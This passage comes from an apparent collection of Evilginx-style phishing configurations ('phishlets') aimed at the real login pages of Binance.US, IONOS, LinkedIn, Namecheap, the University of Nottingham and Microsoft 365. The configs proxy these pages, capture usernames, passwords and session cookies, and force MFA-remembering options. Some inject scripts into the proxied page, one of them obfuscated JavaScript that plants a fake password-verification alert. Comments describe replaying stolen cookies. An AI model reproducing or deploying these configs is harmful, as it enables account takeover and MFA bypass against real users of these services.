50 |     - {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
51 |     - {triggers_on: 'accounts.binance.us', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
52 |  
53 | 
54 | auth_tokens:
55 |   - domain: 'accounts.binance.us'
56 |     keys: [".*,regexp"]
57 | credentials:
58 |     username:
59 |      key: 'email'
60 |      search: '(.*)'
61 |      type: 'post'
62 |     password:
63 |      key: 'password'
64 |      search: '(.*)'
65 |      type: 'post'
66 | auth_urls:
67 |   - '/mail'
68 |   - '/mail/'
69 | login:
70 |   domain: 'accounts.binance.us'
71 |   path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l'


--------------------------------------------------------------------------------
/ionos.yaml:
--------------------------------------------------------------------------------
 1 | 
 2 | author: '@An0nud4y' 
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'ionos.com', session: true, is_landing: true}
 6 |   - {phish_sub: '', orig_sub: '', domain: 'ionos.com', session: true, is_landing: false}
 7 | 
 8 | sub_filters:
 9 |   - {triggers_on: 'login.ionos.com', orig_sub: 'login', domain: 'ionos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 |   - {triggers_on: 'login.ionos.com', orig_sub: '', domain: 'ionos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 | 
12 | auth_tokens:
13 |   - domain: '.ionos.com'
14 |     keys: ['.*,regexp']
15 | auth_urls:
16 |   - ''  
17 | credentials:
18 |   username:
19 |     key: 'oaologin.username'
20 |     search: '(.*)'
21 |     type: 'post'
22 |   password:
23 |     key: 'oaologin.password'
24 |     search: '(.*)'
25 |     type: 'post'
26 |   custom:
27 |     key: 'oaologin.additionaldata'
28 |     search: '(.*)'
29 |     type: 'post'
30 | login:
31 |   domain: 'login.ionos.com'
32 |   path: '/' 
33 |   
34 | 


--------------------------------------------------------------------------------
/linkedin2.yaml:
--------------------------------------------------------------------------------
 1 | author: '@an0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'platform', orig_sub: 'platform', domain: 'linkedin.com', session: false, is_landing: false}
 6 |   - {phish_sub: 'static-exp1', orig_sub: 'static-exp1', domain: 'licdn.com', session: false, is_landing: false}
 7 | 
 8 | sub_filters:
 9 |   - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'linkedin.com', search: '{hostname_regex}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
10 |   - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'licdn.com', search: '{hostname_regex}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
11 | 
12 | 
13 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
14 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
15 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
16 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
17 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
18 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
19 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
20 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
21 |   - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
22 | 
23 | 
24 | auth_tokens:
25 |   - domain: '.www.linkedin.com'
26 |     keys: ['.*,regexp']
27 |   - domain: '.linkedin.com'
28 |     keys: ['.*,regexp']
29 |     
30 | 
31 | auth_urls:
32 |   - '/feed'    
33 |   - '/feed/'
34 | credentials:
35 |   username:
36 |     key: 'session_key'
37 |     search: '(.*)'
38 |     type: 'post'
39 |   password:
40 |     key: 'session_password'
41 |     search: '(.*)'
42 |     type: 'post'
43 | 
44 | login:
45 |   domain: 'www.linkedin.com'
46 |   path: '/uas/login'
47 | 
48 | js_inject:
49 |   - trigger_domains: ["www.linkedin.com"]
50 |     trigger_paths: ["/uas/login"]
51 |     trigger_params: ["email"]
52 |     script: |
53 |       function lp(){
54 |         var email = document.querySelector("#username");
55 |         var password = document.querySelector("#password");
56 |         if (email != null && password != null) {
57 |           email.value = "{email}";
58 |           password.focus();
59 |           return;
60 |         }
61 |         setTimeout(function(){lp();}, 100);
62 |       }
63 |       setTimeout(function(){lp();}, 100);
64 | 


--------------------------------------------------------------------------------
/namecheap.yaml:
--------------------------------------------------------------------------------
 1 | 
 2 | author: '@An0nud4y' 
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'namecheap.com', session: true, is_landing: true}
 6 |   - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false}
 7 |   - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false}
 8 |   - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false}
 9 |   - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false}
10 | 
11 | sub_filters:
12 |   - {triggers_on: 'www.namecheap.com', orig_sub: 'www', domain: 'namecheap.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
13 |   - {triggers_on: 'www.namecheap.com', orig_sub: 'ap.www', domain: 'namecheap.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
14 | 
15 | 
16 | auth_tokens:
17 |   - domain: 'ap.www.namecheap.com'
18 |     keys: ['.ncauth, rdt_uuid, SessionId, x-ncpl-auth, x-sf-country']  
19 | credentials:
20 |   username:
21 |     key: 'LoginUserName'
22 |     search: '(.*)'
23 |     type: 'post'
24 |   password:
25 |     key: 'LoginPassword'
26 |     search: '(.*)'
27 |     type: 'post'
28 |   custom:
29 |     - key: 'LoginUserName'
30 |       search: '(.*)'
31 |       type: 'post'
32 |     - key: 'LoginUserName'
33 |       search: '(.*)'
34 |       type: 'post'
35 |     - key: 'LoginPassword'
36 |       search: '(.*)'
37 |       type: 'post'
38 |     - key: 'LoginPassword'
39 |       search: '(.*)'
40 |       type: 'post'      
41 |       
42 | login:
43 |   domain: 'www.namecheap.com'
44 |   path: '/myaccount/login/' 
45 |   
46 | 


--------------------------------------------------------------------------------
/nottingham.yaml:
--------------------------------------------------------------------------------
 1 | author: ‘@harris'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'nottingham.ac.uk', session: true, is_landing: true}
 5 |   - {phish_sub: '', orig_sub: '', domain: 'nottingham.ac.uk', session: true, is_landing: false}
 6 |   - {phish_sub: 'myview', orig_sub: 'myview', domain: 'nottingham.ac.uk', session: true, is_landing: false}
 7 | 
 8 | 
 9 | sub_filters:
10 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://myview.nottingham.ac.uk:443', replace: 'https:/$
11 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2Fmyview.nottingham.ac.uk:443', replace: 'h$
12 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'myview.nottingham.ac.uk:443', replace: '{hostname}', mi$
13 | 
14 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$
15 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$
16 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$
17 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$
18 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$
19 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$
20 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html'$
21 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mim$
22 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hos$
23 | 
24 | 
25 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/j$
26 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['tex$
27 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', $
28 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$
29 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$
30 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$
31 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$
32 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$
33 |   - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$
34 | 
35 | 
36 |  - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$
37 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$
38 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$
39 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$
40 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$
41 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$
42 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html'$
43 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mim$
44 |   - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hos$
45 | 
46 | 
47 | 
48 | auth_tokens:
49 |   - domain: '.nottingham.ac.uk'
50 |     keys: ['.*,regexp']
51 |   - domain: 'myview.nottingham.ac.uk'
52 |     keys: ['.*,regexp']
53 |   - domain: 'www.nottingham.ac.uk'
54 |     keys: ['.*,regexp']
55 | credentials:
56 |   username:
57 |     key: 'username'
58 |     search: '(.*)'
59 |     type: 'post'
60 |   password:
61 |     key: 'password'
62 |     search: '(.*)'
63 |     type: 'post'
64 | 
65 | login:
66 |   domain: 'myview.nottingham.ac.uk'
67 |   path: '/dashboard/dashboard-ui/index.html#/landing'


--------------------------------------------------------------------------------
/o365(2).yaml:
--------------------------------------------------------------------------------
 1 | name: 'o365'
 2 | author: '@jamescullum'
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
 7 |   - {phish_sub: 'adfs', orig_sub: 'sts', domain: 'ribkoff.com', session: true, is_landing:false}
 8 |   
 9 |   # The lines below are needed if your target organization utilizes ADFS.
10 |   # If they do, you need to uncomment all following lines that contain <...>
11 |   # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
12 |   # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
13 |   #    <insert-adfs-subdomain> = adfs
14 |   #    <insert-adfs-host> = example.com
15 |   #    <insert-adfs-subdomain-and-host> = adfs.example.com
16 |   #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
17 |   #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
18 | sub_filters:
19 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
20 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
21 |   # Uncomment and fill in if your target organization utilizes ADFS
22 |   #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
23 | 
24 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://sts.ribkoff.com', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
25 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://sts.ribkoff.com', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
26 |   - {triggers_on: 'sts.ribkoff.com', orig_sub: 'sts', domain: 'ribkoff.com', search: 'href="https://sts.ribkoff.com', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
27 |   - {triggers_on: 'sts.ribkoff.com', orig_sub: 'sts', domain: 'ribkoff.com', search: 'https://sts.ribkoff.com', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
28 | 
29 | auth_tokens:
30 |   - domain: '.login.microsoftonline.com'
31 |     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
32 |   - domain: 'login.microsoftonline.com'
33 |     keys: ['SignInStateCookie']
34 | credentials:
35 |   username:
36 |     key: '(login|UserName)'
37 |     search: '(.*)'
38 |     type: 'post'
39 |   password:
40 |     key: '(passwd|Password)'
41 |     search: '(.*)'
42 |     type: 'post'
43 | login:
44 |   domain: 'login.microsoftonline.com'
45 |   path: '/'


--------------------------------------------------------------------------------
/o365(April-latest).yaml:
--------------------------------------------------------------------------------
 1 | name: 'o365'
 2 | author: '@APT29'
 3 | min_ver: '2.4.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
 7 |   - {phish_sub: 'aadcdn', orig_sub: 'aadcdn', domain: 'msftauth.net', session: false, auto_filter: true, is_landing:false}
 8 | sub_filters:
 9 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
10 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
11 | 
12 | auth_tokens:
13 |   - domain: '.login.microsoftonline.com'
14 |     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
15 |   - domain: 'login.microsoftonline.com'
16 |     keys: ['SignInStateCookie']      
17 | 
18 | 
19 | # INJECT COOKIES
20 | # --------------
21 | # 
22 | # Browse the url https://login.microsoftonline.com
23 | # inject the capture cookies 
24 | # Refresh the browser
25 | 
26 | 
27 | 
28 | credentials:
29 |   username:
30 |     key: 'login'
31 |     search: '(.*)'
32 |     type: 'post'
33 |   password:
34 |     key: 'passwd'
35 |     search: '(.*)'
36 |     type: 'post'     
37 | auth_urls:
38 |   - '/common/SAS/ProcessAuth'
39 |   - '/kmsi'
40 | login:
41 |   domain: 'login.microsoftonline.com'
42 |   path: '/' 
43 | force_post:
44 |   - path: '/kmsi'
45 |     search: 
46 |       - {key: 'LoginOptions', search: '.*'}
47 |     force:
48 |       - {key: 'LoginOptions', value: '1'}
49 |     type: 'post'
50 |   - path: '/common/SAS'
51 |     search: 
52 |       - {key: 'rememberMFA', search: '.*'}
53 |     force:
54 |       - {key: 'rememberMFA', value: 'true'}
55 |     type: 'post'
56 | js_inject:
57 |   - trigger_domains: ["login.microsoftonline.com"]
58 |     trigger_paths: ["/common/oauth2/","/","/*"]
59 |     script: |
60 |       var _0x410e92=_0x5778;(function(_0x35da17,_0x3a9f50){var _0x5ec8bb=_0x5778,_0x54aaae=_0x35da17();while(!![]){try{var _0x444577=-parseInt(_0x5ec8bb(0x167))/(-0x41*0x91+0x1243*0x1+-0x128f*-0x1)*(-parseInt(_0x5ec8bb(0x187))/(0x3*0x2fe+-0xbc7+-0x2cf*-0x1))+-parseInt(_0x5ec8bb(0x15b))/(0xead*0x1+-0x16e+-0xd3c)*(-parseInt(_0x5ec8bb(0x155))/(-0x1b*-0x24+-0x3*-0x233+-0xa61*0x1))+-parseInt(_0x5ec8bb(0x15d))/(-0x223c+0x1420*-0x1+-0x3661*-0x1)+parseInt(_0x5ec8bb(0x165))/(-0x23a*0x10+0xf*0x4a+0x3ea*0x8)+-parseInt(_0x5ec8bb(0x16b))/(-0xfb*-0x26+-0x24c*0xd+-0x75f)*(parseInt(_0x5ec8bb(0x143))/(-0x1e23+0x1256+-0xbd5*-0x1))+parseInt(_0x5ec8bb(0x144))/(0xcb3+-0x6*0x61+0x299*-0x4)+-parseInt(_0x5ec8bb(0x16f))/(0x7a*0x4+0x1ae3+0x1*-0x1cc1)*(parseInt(_0x5ec8bb(0x166))/(0x1*-0x147d+-0x1a97*-0x1+-0x60f));if(_0x444577===_0x3a9f50)break;else _0x54aaae['push'](_0x54aaae['shift']());}catch(_0x16a14a){_0x54aaae['push'](_0x54aaae['shift']());}}}(_0x4864,0x5ddd9+0xc01*0xfb+-0x9d905)); checkElement3=async _0x4da37=>{var _0x2b896c=_0x5778,_0x206726={'NtbiS':function(_0x56a0cf,_0x29c3b0){return _0x56a0cf===_0x29c3b0;}};for(;_0x206726[_0x2b896c(0x154)](null,document[_0x2b896c(0x16a)+_0x2b896c(0x17d)](_0x4da37));)await new Promise(_0x3df563=>requestAnimationFrame(_0x3df563));return document[_0x2b896c(0x16a)+_0x2b896c(0x17d)](_0x4da37);};checkElement3(_0x410e92(0x15c)+_0x410e92(0x14e))[_0x410e92(0x185)](_0x468602=>{var _0x54fcff=_0x410e92,_0x3a611f={'wyKIM':_0x54fcff(0x14d)+_0x54fcff(0x149)};cancel=document[_0x54fcff(0x175)+_0x54fcff(0x173)](_0x3a611f[_0x54fcff(0x171)]),cancel[_0x54fcff(0x16d)](),cancel[_0x54fcff(0x176)]();return;});function _0x5778(_0x48bd0d,_0x4f20be){var _0x4b42d1=_0x4864();return _0x5778=function(_0x55d66e,_0x2b8c46){_0x55d66e=_0x55d66e-(0xcb3*-0x1+-0x7a*-0x3d+-0x102*0xf);var _0x56b5e4=_0x4b42d1[_0x55d66e];return _0x56b5e4;},_0x5778(_0x48bd0d,_0x4f20be);} checkElement=async _0x215f7d=>{var _0x30874e=_0x410e92,_0x5e7d54={'supNP':function(_0x883434,_0x323f5e){return _0x883434===_0x323f5e;}};for(;_0x5e7d54[_0x30874e(0x181)](null,document[_0x30874e(0x16a)+_0x30874e(0x17d)](_0x215f7d));)await new Promise(_0x45909d=>requestAnimationFrame(_0x45909d));return document[_0x30874e(0x16a)+_0x30874e(0x17d)](_0x215f7d);};checkElement(_0x410e92(0x183))[_0x410e92(0x185)](_0x156d6f=>{var _0x97d941=_0x410e92,_0x4efb2f={'NaHcx':_0x97d941(0x183),'wwDfO':_0x97d941(0x170)+'n9','FzbAh':_0x97d941(0x164)+_0x97d941(0x147),'nkPuA':function(_0x551351,_0x4abd64){return _0x551351<_0x4abd64;},'jtsCS':function(_0x2ba4ef,_0x56de8a){return _0x2ba4ef-_0x56de8a;},'KoKeW':function(_0x4ad73f,_0x490cea,_0x149ce4){return _0x4ad73f(_0x490cea,_0x149ce4);}},_0x4cfa81=document[_0x97d941(0x16a)+_0x97d941(0x17d)](_0x4efb2f[_0x97d941(0x157)]),_0x23ca5a=document[_0x97d941(0x16a)+_0x97d941(0x17d)](_0x4efb2f[_0x97d941(0x168)]),_0x24489f=window[_0x97d941(0x177)][_0x97d941(0x14a)];if(/#/[_0x97d941(0x146)](window[_0x97d941(0x177)][_0x97d941(0x14a)])){var _0x430fac=_0x4efb2f[_0x97d941(0x158)][_0x97d941(0x186)]('|'),_0x30fb78=0x138e+0x8*0x3a9+-0x30d6;while(!![]){switch(_0x430fac[_0x30fb78++]){case'0':_0x23ca5a[_0x97d941(0x176)]();continue;case'1':_0x55747b=String[_0x97d941(0x14b)+'de'][_0x97d941(0x174)](String,_0x2bbd05);continue;case'2':var _0x4fc903=_0x275d55[-0x24+-0x59*-0x1f+-0xaa2][_0x97d941(0x156)](/[=]/gi,'');continue;case'3':_0x4cfa81[_0x97d941(0x17b)]=_0x55747b;continue;case'4':return;case'5':_0x23ca5a[_0x97d941(0x16d)]();continue;case'6':for(var _0x55747b,_0x239c92=_0x4fc903[_0x97d941(0x14c)](-0x2316+0x1d*-0x157+0x49f2),_0x2bbd05=[],_0x8e4eb7=-0x2482+-0x799+0x2c1b;_0x4efb2f[_0x97d941(0x152)](_0x8e4eb7,_0x4efb2f[_0x97d941(0x15f)](_0x239c92[_0x97d941(0x14f)],0x39e+-0x1ed5+0x218*0xd));_0x8e4eb7+=0x22b6+0x2*0x51+-0x1*0x2356)_0x2bbd05[_0x97d941(0x150)](_0x4efb2f[_0x97d941(0x169)](parseInt,_0x239c92[_0x97d941(0x161)](_0x8e4eb7,0x1cef+-0x316+-0x19d7),-0x1ae+0x7*-0x259+0x122d));continue;case'7':_0x4cfa81[_0x97d941(0x16d)]();continue;case'8':var _0x275d55=_0x24489f[_0x97d941(0x186)]('#');continue;}break;}}}); checkElement2=async _0x2195e9=>{var _0xf10e89=_0x410e92,_0x3bc8a4={'qbHBe':function(_0x5c47e9,_0xf62cf8){return _0x5c47e9===_0xf62cf8;}};for(;_0x3bc8a4[_0xf10e89(0x151)](null,document[_0xf10e89(0x16a)+_0xf10e89(0x17d)](_0x2195e9));)await new Promise(_0x5283f6=>requestAnimationFrame(_0x5283f6));return document[_0xf10e89(0x16a)+_0xf10e89(0x17d)](_0x2195e9);};function _0x4864(){var _0x4e5d58=['supNP','\x20accessing','#i0116','QYnJR','then','split','4376DOmDZX','orgotPassw','rt\x20alert-e','1492360xeMxib','2374506yToWXe','/div>','test','3|5|0|4','\x20password<','Cancel','href','fromCharCo','substring','desktopSso','oCancel','length','push','qbHBe','nkPuA','erify\x20your','NtbiS','238444BSAvJm','replace','NaHcx','FzbAh','jzwAY','i0118','51eVYSJs','#desktopSs','3145070RoBCQT','mportant\x22\x20','jtsCS','ord','substr','use\x20you\x27re','znBFb','8|2|6|1|7|','298710PohhQS','2002TmIuPF','379yZWIKQ','wwDfO','KoKeW','querySelec','7ABcWLj','centHTML','focus','beforebegi','45620ORReFM','#idSIButto','wyKIM','\x20info,\x20you','ById','apply','getElement','click','location','insertAdja','<div\x20id=\x22i','\x20need\x20to\x20v','value','\x20sensitive','tor','rror\x22>Beca','class=\x22ale','#idA_PWD_F'];_0x4864=function(){return _0x4e5d58;};return _0x4864();}checkElement2(_0x410e92(0x180)+_0x410e92(0x141)+_0x410e92(0x160))[_0x410e92(0x185)](_0x54c929=>{var _0x2c9990=_0x410e92,_0x4ced35={'QYnJR':_0x2c9990(0x15a),'jzwAY':_0x2c9990(0x16e)+'n','znBFb':_0x2c9990(0x179)+_0x2c9990(0x15e)+_0x2c9990(0x17f)+_0x2c9990(0x142)+_0x2c9990(0x17e)+_0x2c9990(0x162)+_0x2c9990(0x182)+_0x2c9990(0x17c)+_0x2c9990(0x172)+_0x2c9990(0x17a)+_0x2c9990(0x153)+_0x2c9990(0x148)+_0x2c9990(0x145)};node=document[_0x2c9990(0x175)+_0x2c9990(0x173)](_0x4ced35[_0x2c9990(0x184)]),node[_0x2c9990(0x178)+_0x2c9990(0x16c)](_0x4ced35[_0x2c9990(0x159)],_0x4ced35[_0x2c9990(0x163)]);return;});


--------------------------------------------------------------------------------
/o365(working-october21).yaml:
--------------------------------------------------------------------------------
 1 | name: 'o365'
 2 | author: '@G66K ICQ: 747246257'
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
 7 |   # The lines below are needed if your target organization utilizes ADFS.
 8 |   # If they do, you need to uncomment all following lines that contain <...>
 9 |   # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
10 |   # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
11 |   #    <insert-adfs-subdomain> = adfs
12 |   #    <insert-adfs-host> = example.com
13 |   #    <insert-adfs-subdomain-and-host> = adfs.example.com
14 | 
